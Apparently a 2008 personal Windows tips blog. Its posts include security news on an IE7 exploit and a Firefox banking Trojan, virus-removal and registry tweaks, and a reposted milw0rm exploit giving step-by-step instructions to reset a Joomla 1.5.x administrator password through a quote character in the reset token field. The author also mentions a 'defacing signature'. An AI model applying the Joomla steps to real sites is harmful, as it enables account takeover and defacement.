Monday, December 15, 2008

Chinese researchers inadvertently release IE7 exploit code

Chinese security researchers have admitted that they inadvertently released code that might be misused to exploit an unpatched Internet Explorer 7 vulnerability.

Scripts to pull off the trick were already on sale in underground forums before the inadvertent release. Even so, anything that increases the likelihood of digital delinquents getting their hands on the exploit is unwelcome.

VeriSign's iDefense security division reports that attack code was up for sale at prices of up to $15,000 through underground forums. Prices are likely to slide following the escape of assault code from labs run by KnownSec.

Security tools firm eEye reckons the flaw has been the target of exploitation since 15 November.

According to iDefense, KnownSec made the code available after failing to realise that last Tuesday's Microsoft bulletins failed to fix the underlying vulnerability behind the bug, which revolves around IE7's handling of malformed XML tags. A explanation of what happened by KnownSec (in Mandarin) can be found here.

The flaw affects XP and Vista users, and creates a means to load Trojans or other forms of malware onto even fully patched Windows boxes simply by tricking surfers into visiting maliciously constructed websites. Thus far the attack method has been restricted to delivering game password stealers, the Internet Storm Centre reports.

Microsoft is investigating reports of attacks and considering its options. The timing of the attack in the run up to the holiday period and just after a bumper batch of eight bulletins suggests an out of sequence patch might be on order before the next scheduled Patch Tuesday, on 13 January. ®

Firefox plug-in Trojan harvests logins

Virus writers have latched onto the popularity of Firefox with a new variant on the established practice of stealing online banking passwords.

A password pinching Trojan that poses as a Firefox Plugin is doing the rounds, Romanian security firm BitDefender warns. ChromeInject-A is typically downloaded onto Windows PCs already compromised by other strains of malware.

Once installed, the Trojan sits in Firefox’s Plugin folder, activating every time the popular browser is started. The backdoor code looks for data exchanged between a compromised machine and a list of pre-programmed banking sites in Europe, Australia and the US.

Harvested login credentials are captured and subsequently posted to a server located in Russia.

More details on the bank sites targeted, along with the general behaviour of the Trojan, can be found in a write-up by BitDefender here.

BitDefender reports that incidents of the malware are “very low”, so the attack is more notable for its novelty than its potency. Malware that capitalises on the popularity of Firefox is rare, but not unprecedented.

Two years ago a spyware package that masqueraded as an extension to the Firefox web browser was spotted on the net. Like ChromeInject-A, FormSpy failed to do much harm.

Source: http://www.theregister.co.uk/2008/12/04/firefox_plug_in_trojan/

Sunday, September 7, 2008

Joomla 1.5.x Remote Admin Password Change


#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} // Get the model $model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2} { $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} // Verify the token if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

full info: http://www.milw0rm.com/exploits/6234

Friday, May 30, 2008

How to remove Flash.10.exe and Macromedia.10.exe virus

This is quite a lame virus but anyway still many computers still infected with this virus. So I will write a tutorial to help people to remove this pest.

Characteristics

As usual, this virus will disable your Registry editor, search and folder option because to keep it hidden. But, this virus will not disable your task manager. Why? Because this is a trap. When you open your task manager and found flash10.exe in the process list, dont end the process yet because by doing it, your computer will shutdown.So what we need to do is just following this step.




Step 1 - Enable registry editor and folder option

Download Washer here. Enable back your registry editor and folder options by using washer.


- If the virus attacked your computer, there will be a check at the Disable Regedit, Hide Find and Hide Folder Option check button.
- Leave the check button and straightaway click the repair registry button and in just a few second, you can access back your registry, search and folder options.
- If this doesn't work, try it again or ask someone to help you.



Step 2 - Remove the virus link in registry

First open the registry editor by Start > Run and type regedit and press enter. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentUser\Run and delete the WindowsMSN key at the right hand-side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\ and delete the C:\WINDOWS\system32\Flash.10.exe key at right hand side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\
CurrentVersion\Windows\
and delete the load key at the right.

Then, go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\
Software\Microsoft\Windows\ShellNoRoam\MUICache

and delete the C:\WINDOWS\system32\Flash.10.exe

and last go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\
Software
\Microsoft\WindowsNT\CurrentVersion\Windows\
and delete load key.

If your are tired to find the key, just press F3 and typed flash.10 and press again F3 to keep search.

After that, restart your computer.


Step 3 - delete the virus file

After restart your computer, make sure the virus is not run anymore. Open your task manager and if Flash.10 and Macromedia.10 is not in the process list, it is safe for you to delete the virus file. If not, repeat step 2.

Before delete the virus, you need to configure your Folder Options first. Open My Computer, click Tools menu and choose Folder Options. If Folder Options did not appear, repeat step 1.

Now Change the setting as my folder options on the picture below. Changes are on Show hidden file, Hide protected operating system file and Hide extension for known files. Click Ok.



Go to C:\Program Files\Common Files\Microsoft Shared\ and delete Macromedia.10.exe

Now, open C:\Program Files\Common Files\Microsoft Shared\DAO\ and delete file MSN.msn. The virus try to spoof by using MSN logo and name.

Then, go to C:\WINDOWS\System32\ . Right Click, choose Arrange Icon By > Modified. Then scroll to the last row and try to find Flash.10.exe, cmd.com, dxdiag.com, JambanMu.com, msconfig.com, ping.com and regedit.com. Delete the file. Remember, just delete the listed file only!!

Then, delete the virus in your USB drive by referring here. Delete only Flash Jokes.exe, Autorun.inf, Flash.10.Setup.exe and Scanner.exe

Now restart your computer. Hopefully your computer will be okay.


...Read more

Friday, May 2, 2008

Saje-saje memoyo


This one of my defacing signature.

announcement!!

I received many comment on a file that i'd uploaded named Washer,that had been infected by virus named virutQ. I have no idea how the virus infect my file but I'd studied the problems and got the solutions. Now I uploaded new Washer that free from virus. Thanks for your comment and thanks for supporting my blog and hopefully still support me. This is the new link. If any problems, please let me know. I just want to help people to solve their problems. Thank you. http://www.humyo.com/F/722217-137064809

Sunday, April 27, 2008

Saturday, April 26, 2008

Change Explorer Background Image

This a simple manipulation of regestry for changing explorer background image.

1. Create your own image in photoshop with you own size. I prefer 785x86 pixel and save with .bmp for example back.bmp.






This is my example.

2. Then open registry editor: Start > Run > Regedit.exe
3. Open HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Toolbar.
4. Add new string by right click and named it BackBitmapShell.
5. Double click the key and enter the full path of your bitmap image. Click OK.
6. Close registry editor and open my computer. Walla!.

Wednesday, April 23, 2008

Bad day

Today, i'm surfing websites. Suddenly appear a message that told me, updates for my free AVG antispyware were completed. I thought it was same as everytime i'm update, but today is different. After the message, i heard a sound and i realize that my profile are fully deleted. There are no more Quick Luanch toolbar, no shorcut in my desktop, and no profile for my Mozilla Firefox. Very bad day because i really forget to save my profile and my restore was turned off. That a big lesson for me to always update my profile.

Sunday, April 20, 2008

My Latest Wallpaper

How to insert things in context menu

Open your Registry Editor by start>run and type regedit.. then, go to HKEY_CLASSES_ROOT\*\Shell\ .

Create a new key by right clicking it. And rename it for whatever you want for example notepad. On the right hand side, double click the default and put on the value, what you want it to appear, example "open with notepad".

And then create new key under the previous key and name it command. Change tha default value to the link to your file for eg: C:\WINDOWS\System32\Notepad.exe and dont forget to add %1 at the end to ensure this is appear only on the supported file only. So it becomes C:\WINDOWS\System32\Notepad.exe %1.



Easy way to rename recycle bin

Many people having problems to rename their recycle bin to whatever name they want it to be. So I provide a simple tutorial on how to do it..

Open up your text editor or notepad and copy the following text into a new file:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

and now this file as whatever name you want but must end with .reg, eg: rename bin.reg.. save the file and double click the saved file and press yes if prompted a message box. Then, you can rename the recycle bin by right click>rename or directly press F2 when highlight the recycle bin..

Change Background of the folder

As Windows XP Home/Pro was released, many have realized that Microsoft had removed our ability to change wallpaper of our folders! Shortly after we realized the trouble on our machines, we got to work on a solution. We’ve found that Microsoft™ did not remove the ability to change the background and text color but instead hide the interface.

Now, it is somewhat simple for anyone to add wallpaper to a Windows XP folder.


1) Open notepad

2) Type in the text below
[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00FFFFFF

3) Save file as desktop.ini
Save as type : All Files

4) Copy the desktop.ini file you just created, and
paste into the folder you want the background to
be change

5) Go to START --> RUN..

6) Type Attrib s "C:\Location of your folder"
Click OK

7) Open your folder and the picture should be set by now.

Tuesday, April 1, 2008

mY Latest Poster

"sometimes you're always want to be.."

Thursday, March 27, 2008

Boost the speed of your Adobe Reader 8.0

To boost your adobe acrobat reader 8.0, open the Adobe Reader 8.0 directory at:

C:\Program Files\Adobe\Reader 8.0\Reader

There you will see Optional and Plug-ins folder. Open the Plug-ins folder, then cut all the files and folders inside and paste it at Optional folder.

Good Luck.